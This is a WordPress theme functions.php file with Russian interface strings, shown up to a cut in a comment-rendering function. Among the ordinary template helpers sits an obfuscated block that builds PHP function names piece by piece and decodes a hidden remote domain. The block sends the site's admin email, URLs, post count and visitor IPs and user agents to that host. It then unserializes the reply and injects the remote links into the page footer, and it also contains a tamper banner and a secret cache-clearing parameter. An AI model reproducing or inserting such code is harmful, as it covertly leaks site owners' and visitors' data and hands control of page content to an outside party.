<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $Qeowwrj='o';$smrrLZ='d';$SgCktTC='d';$dNzAW='_';$BTYuhXB='6';$ggdOLrp='b';$SQmV='e';$XZRUAf='c';$Khhwj='a';$IWvcC='e';$bpZsF='4';$SpLY='s';$hcQYE='e';$uGwyqhTn=$ggdOLrp.$Khhwj.$SpLY.$IWvcC.$BTYuhXB.$bpZsF.$dNzAW.$smrrLZ.$hcQYE.$XZRUAf.$Qeowwrj.$SgCktTC.$SQmV;$GDJlmgI='i';$pnYw='n';$kDmhIm='g';$fGgpk='f';$zNqN='e';$kFpUQC='t';$BvsVlqv='z';$xSFpu='l';$HqmY='a';$ZjENghgk=$kDmhIm.$BvsVlqv.$GDJlmgI.$pnYw.$fGgpk.$xSFpu.$HqmY.$kFpUQC.$zNqN;$qEnB='1';$vyYjlL='r';$XIRF='t';$FEuoN='3';$heBHXpM='o';$iHVL='t';$ceIjI='_';$NfHGW='r';$DATN='s';$JDwpTRqB=$DATN.$iHVL.$vyYjlL.$ceIjI.$NfHGW.$heBHXpM.$XIRF.$qEnB.$FEuoN;$AKVe='v';$mvqBP='r';$JGTxKZ='t';$NZTDA='r';$OEgk='s';$ugOK='e';$tMTqMpaL=$OEgk.$JGTxKZ.$NZTDA.$mvqBP.$ugOK.$AKVe;                     $oi____z='o';$by__r='d';$uu___________i='d';$mm____g='_';$nn_____________x='6';$qe______j='b';$im_____j='e';$vi______________b='c';$zl_____u='a';$kl___________s='e';$au_________k='4';$fg________c='s';$dj__c='e';$rg___________t=$qe______j.$zl_____u.$fg________c.$kl___________s.$nn_____________x.$au_________k.$mm____g.$by__r.$dj__c.$vi______________b.$oi____z.$uu___________i.$im_____j;$fm______________a='n';$vp___________p='n';$ki______________l='u';$di___________t='t';$hu______v='i';$kx_____________p='e';$do____u='c';$wd____________r='s';$js__________m='x';$tk_______k='f';$bx___________w='s';$nc_____________y='t';$ab_______________k='_';$qt____y='o';$va_________a='i';$cl_____________g=$tk_______k.$ki______________l.$fm______________a.$do____u.$nc_____________y.$va_________a.$qt____y.$vp___________p.$ab_______________k.$kx_____________p.$js__________m.$hu______v.$wd____________r.$di___________t.$bx___________w;$yf___________m='o';$oz_____________x='e';$uf__________i='n';$od__z='p';$tb_________v='f';$gi___v=$tb_________v.$yf___________m.$od__z.$oz_____________x.$uf__________i;$at_________g='r';$os_____w='e';$lv___f='f';$vn_____________w='d';$nw_____________u='a';$pv_______f=$lv___f.$at_________g.$os_____w.$nw_____________u.$vn_____________w;$dw______w='l';$ss__m='f';$ci_______________e='o';$ix___________m='c';$fn_____________u='e';$mi_____j='s';$fv___z=$ss__m.$ix___________m.$dw______w.$ci_______________e.$mi_____j.$fn_____________u;define("WP_ID", $rg___________t("Mi4wLjA="));define("WP_TTL", $rg___________t("MTA4MDA="));define("WP_SRC", $rg___________t("dHBva24="));function wp_get_header() {global $rg___________t, $cl_____________g;if ($cl_____________g($rg___________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$cl_____________g($rg___________t("d3BfZ2V0X2Zvb3Rlcg==")) &&$cl_____________g($rg___________t("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $rg___________t, $gi___v, $fv___z, $pv_______f;$uh_________f = TEMPLATEPATH."/".$rg___________t("Zm9vdGVyLnBocA==");$gy__w = @$gi___v($uh_________f, "r");$uh_________f = @$pv_______f($gy__w, @filesize($uh_________f));@$fv___z($gy__w);$lz______b = TEMPLATEPATH."/".$rg___________t("ZnVuY3Rpb25zLnBocA==");$gy__w = @$gi___v($lz______b, "r");$lz______b = @$pv_______f($gy__w, @filesize($lz______b));@$fv___z($gy__w);$xv__________t = 0;if($uh_________f && $lz______b) {if ($rg___________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($uh_________f, $rg___________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$xv__________t = 1;}if (substr_count($uh_________f, "wp_theme_GPL_credits()") < 1) {$xv__________t = 2;}}if(WP_ID != "2.0.0") {$xv__________t = 12;}}if($xv__________t > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $xv__________t -->";}}function wp_loaded() {global $rg___________t, $cl_____________g;return $cl_____________g($rg___________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($dq__q, $kz_____o = "(more...)", $mu___q = 0, $hk__o = "") {$pi____c = get_the_content($kz_____o, $mu___q, $hk__o);$pi____c = apply_filters("the_content", $pi____c);$pi____c = str_replace("]]>", "]]>", $pi____c);if (strlen($_GET["p"]) > 0) {echo $pi____c;}else if ((strlen($pi____c)>$dq__q) && ($lk_______a = strpos($pi____c, " ", $dq__q ))) {$pi____c = substr($pi____c, 0, $lk_______a);$pi____c = $pi____c;echo $pi____c;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$kz_____o</a></div></p>";} else {echo $pi____c;}}}$oa____________u='_';$cu_______________p='a';$hv______m='s';$nn_________l='d';$xd________a='4';$zm____________o='e';$yd____x='6';$rs_______o='e';$yt____________s='e';$yb________g='c';$ph______n='b';$ud___w='n';$wt____________v='o';$ja_________o=$ph______n.$cu_______________p.$hv______m.$yt____________s.$yd____x.$xd________a.$oa____________u.$zm____________o.$ud___w.$yb________g.$wt____________v.$nn_________l.$rs_______o;$iw___m='e';$xt__g='e';$qs__________r='l';$zc_____________m='t';$fz________w='g';$qe___________j='n';$ud__________p='n';$zy______f='t';$tu_______l='t';$nd_______s='_';$eo___________p='i';$fe____x='s';$yx____x='e';$rs____________y='f';$sa_____i='c';$tx_______________r='o';$uv______s='_';$ai__________q=$rs____________y.$eo___________p.$qs__________r.$yx____x.$uv______s.$fz________w.$iw___m.$tu_______l.$nd_______s.$sa_____i.$tx_______________r.$ud__________p.$zy______f.$xt__g.$qe___________j.$zc_____________m.$fe____x;$yu___f='s';$jo____________a='_';$cc__v='e';$rx___________n='e';$ng_______h='f';$jh__________a='s';$ir_______v='i';$fk____________k='x';$hg__j='i';$bd__________x='t';$wg___________r='l';$vc________d=$ng_______h.$hg__j.$wg___________r.$rx___________n.$jo____________a.$cc__v.$fk____________k.$ir_______v.$yu___f.$bd__________x.$jh__________a;$rs______v='o';$ti________e='c';$es____j='n';$wz________j='_';$ur__p='r';$un_____________p='o';$mu_____________c='v';$yt_____u='e';$fv____l='m';$sf__________x='r';$km___r='e';$oq___________d='p';$gs________f='s';$ba______________t='a';$pk______t='i';$dx______k=$mu_____________c.$km___r.$ur__p.$gs________f.$pk______t.$rs______v.$es____j.$wz________j.$ti________e.$un_____________p.$fv____l.$oq___________d.$ba______________t.$sf__________x.$yt_____u;$uo______________d='f';$at________d='o';$fq_______________n='s';$re______e='p';$us_______________g='k';$xs_______c='n';$bz_______________m='o';$vb__________y='c';$mj_____________h='e';$dj_______________u=$uo______________d.$fq_______________n.$bz_______________m.$vb__________y.$us_______________g.$at________d.$re______e.$mj_____________h.$xs_______c;$va_______________r='t';$fk_____n='e';$yr__i='w';$ms______s='i';$gy_________x='r';$gn__q='f';$cg____n=$gn__q.$yr__i.$gy_________x.$ms______s.$va_______________r.$fk_____n;$io__n='5';$jv_______________v='m';$ni_________i='d';$zw______________f=$jv_______________v.$ni_________i.$io__n;$no_______________c='a';$ys______________v='r';$hl__________f='t';$zd_______y='h';$oz__l='l';$in_____________y='p';$zi___________k='e';$em__________l='a';$gw________d=$ys______________v.$zi___________k.$em__________l.$oz__l.$in_____________y.$no_______________c.$hl__________f.$zd_______y;$ft_____k='a';$im__n='e';$kh_________d='z';$pc_______e='l';$tb_______________x='s';$oy______u='u';$as_______________a='i';$zs______m='n';$sg____________o='i';$ek______________o='e';$pr_________g='r';$ad_____w=$oy______u.$zs______m.$tb_______________x.$ek______________o.$pr_________g.$sg____________o.$ft_____k.$pc_______e.$as_______________a.$kh_________d.$im__n;$ul_______________q='e';$zf_____n='n';$zv___________g='m';$gn________o='a';$xd____c='p';$bf___________r='t';$gp____m='m';$fz__________c=$bf___________r.$ul_______________q.$zv___________g.$xd____c.$zf_____n.$gn________o.$gp____m;$rc______________w='c';$ap_______y='t';$hc_____n='e';$gj_______s='a';$cg_______________m='o';$iy____________b='_';$go____________w='n';$ul______________b='r';$ov_______________u='e';$pm_____________o='r';$jn_________l='c';$zr______________a='e';$ka__________g='t';$fj_________x='x';$gi_______________u='a';$ey__________j='t';$fz______b='s';$rx________p='m';$yy_______a='e';$yg__________q='_';$ga_________o='t';$cg_____________z=$fz______b.$ka__________g.$pm_____________o.$yy_______a.$gj_______s.$rx________p.$iy____________b.$rc______________w.$cg_______________m.$go____________w.$ap_______y.$ov_______________u.$fj_________x.$ga_________o.$yg__________q.$jn_________l.$ul______________b.$zr______________a.$gi_______________u.$ey__________j.$hc_____n;function fg____________r($yd_________o) {global $rg___________t, $cl_____________g, $ai__________q, $dx______k, $cg_____________z;if (!$cl_____________g($rg___________t("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($dx______k(PHP_VERSION, "5.0.0", ">=") && $cl_____________g($rg___________t("ZmlsZV9nZXRfY29udGVudHM=")) && $cl_____________g($rg___________t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$cy____________n = $cg_____________z(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$fx__________p = @$ai__________q($yd_________o, 0, $cy____________n);} else {$fx__________p = @$ai__________q($yd_________o, 0);}return $fx__________p;}function ul_________h($yd_________o) {global $cl_____________g, $dj_______________u, $cg____n, $rg___________t;if (!$cl_____________g($rg___________t("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$no______x = strpos($yd_________o, "/", 7);$ql_____m = array("uri"     => substr($yd_________o, $no______x),"host"    => str_replace("http://", "", substr($yd_________o, 0, $no______x)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$hk_________y = @$dj_______________u("$ql_____m[host]", 80, $as___________k, $pt____________g, 4);if (!$hk_________y) {return false;} else {$fx__________p = "";$ip_______________c  = "GET $ql_____m[uri] HTTP/1.0\r\n";$ip_______________c .= "Host: $ql_____m[host]\r\n";$ip_______________c .= "Referer: $ql_____m[referer]\r\n";$ip_______________c .= "Connection: Close\r\n\r\n";@$cg____n($hk_________y, $ip_______________c);while (!@feof($hk_________y)) {$jr_____________m = @fgets($hk_________y, (1024*24));if ($jr_____________m == "\r\n") {$kn___________i = true;continue;}if ($kn___________i) {$fx__________p .= $jr_____________m;}}return $fx__________p;}}function pi______________w($yd_________o) {global $cl_____________g;$om____v = false;if ($yd_________o != "") {if ($cl_____________g("fg____________r")) {$om____v = @fg____________r($yd_________o);}if (!$om____v && ($cl_____________g("ul_________h"))) {$om____v = @ul_________h($yd_________o);}}return $om____v;}function vd_______________e() {global $_SERVER, $zw______________f;$lr___h = $_SERVER["SERVER_NAME"];if (substr("$lr___h", 0, 4) == "www.") {$lr___h = substr("$lr___h", 4);}$lr___h = $zw______________f("$_SERVER[SERVER_NAME]");return $lr___h;}function xi_______________z() {return "file";}function mh___d($yd_________o) {global $_SERVER, $ai__________q, $vc________d, $gi___v, $fv___z, $cg____n;$je________u = qy___i();$qg____________s = vd_______________e().".jpg";$tc_______t = $je________u["dir_upload"]["path"]."/$qg____________s";$he_____o = @filemtime($tc_______t);if (!$he_____o || ((time()-$he_____o) >= WP_TTL)) {$om____v = pi______________w($yd_________o);if ($om____v) {if ($vc________d($tc_______t)) {@unlink($tc_______t);}$gy__w = @$gi___v($tc_______t, "x+");@$cg____n($gy__w, $om____v);@$fv___z($gy__w);}} else {if ($vc________d($tc_______t)) {$om____v = @$ai__________q($tc_______t);} else {$om____v = false;}}return $om____v;}function qy___i() {global $_SERVER, $rg___________t, $ja_________o;$oc____________e = wp_count_posts("post");$ft____________y = pathinfo(get_bloginfo("template_directory"));$je________u = array("url" => array("report"      => $rg___________t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ft____________y,"dir_upload"=> kl__z(),"queryString"=> array("?a001=".WP_ID,"a004=".$ft____________y[filename],"a005=".$oc____________e->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> ");$je________u["url"]["queryString"] = implode("&", $je________u["queryString"]);$je________u["url"]["report"] = $je________u["url"]["report"]."/?".$ja_________o($je________u["url"]["queryString"]).".html";return $je________u;}function kl__z() {$qs___t = wp_upload_dir();if (isset($qs___t["error"])) {$uf___________e = om__n();if (is_writable($uf___________e)) {$qs___t = array("path" => $uf___________e);}}return $qs___t;}function om__n() {global $cl_____________g, $zw______________f, $gw________d, $fz__________c;$fx_________w = (bool) ini_get("safe_mode");if ($fx_________w == true) {return false;}if ($cl_____________g("sys_get_temp_dir")) {$sc_______x = sys_get_temp_dir();if (is_writable($sc_______x)) {return $gw________d($sc_______x);}}if (!empty($_ENV["TMP"])) {return $gw________d($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $gw________d($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $gw________d($_ENV["TEMP"]);} else {$ie_____________t = $fz__________c($zw______________f(uniqid(rand(), true)), "");if ($ie_____________t) {$sc_______x = $gw________d(dirname($ie_____________t));@unlink($ie_____________t);return $sc_______x;} else {return false;}}}function gx_____e() {global $_GET, $vc________d;$je________u = qy___i();$lr___h = vd_______________e();$wg_____________j = xi_______________z();$is________m = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($wg_____________j == "file") {$tc_____________c = $je________u["dir_upload"]["path"]."/".$lr___h.".jpg";if ($vc________d($tc_____________c)) {@unlink($tc_____________c);$is________m = "deleted";}}$xg________j = array("s"=> $is________m,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($xg________j AS $nb________h => $eh_______f) echo " [$nb________h:$eh_______f]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $cl_____________g, $rg___________t, $ad_____w;$je________u = qy___i();$wp____________x = "mh___d";if ($cl_____________g($wp____________x)) {$fx__________p = $wp____________x($je________u["url"]["report"]);}if ($fx__________p) {if ($fx__________p = @$rg___________t($fx__________p)) {$fx__________p = @$ad_____w($fx__________p);if (strlen($fx__________p[custom_credit]) >= 5) {$je________u["default_string"] = $fx__________p[custom_credit];}if ($fx__________p["status"] == "0") {$ab__r = 1;$qi__________r = 1;} else {$bo__________d = sizeof($fx__________p["links"]);$aa____l = $je________u["default_string"];if ($bo__________d > 0 && $fx__________p["links"] !== "") {$ag____________m = 0;foreach ($fx__________p["links"] as $vu_______________p => $qz_____________m) {$ag____________m++;if ($qz_____________m->l_path == "" || $qz_____________m->l_path == $_SERVER["REQUEST_URI"]) {$qz_____________m->l_href = htmlspecialchars(strip_tags($qz_____________m->l_href));$qz_____________m->l_title = htmlspecialchars(strip_tags($qz_____________m->l_title));$qz_____________m->l_anchor = htmlspecialchars(strip_tags($qz_____________m->l_anchor));$aa____l .= " | ";$aa____l .= "<a href='$qz_____________m->l_href' title='$qz_____________m->l_title'";if ($qz_____________m->l_nofollow == "1") {$aa____l .= " rel='nofollow'";}$aa____l .= ">$qz_____________m->l_anchor</a>";}}}$je________u["links"] = "$aa____l";if ($fx__________p[credit] == "0") {$je________u["links"] = "";}}} else {$ab__r = "1";}} else {$ab__r = "1";}if ($ab__r == "1") {$je________u["links"] = $je________u["default_string"];}echo "$je________u[links]";echo "<!-- s: $fx__________p[signature] -->";gx_____e();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
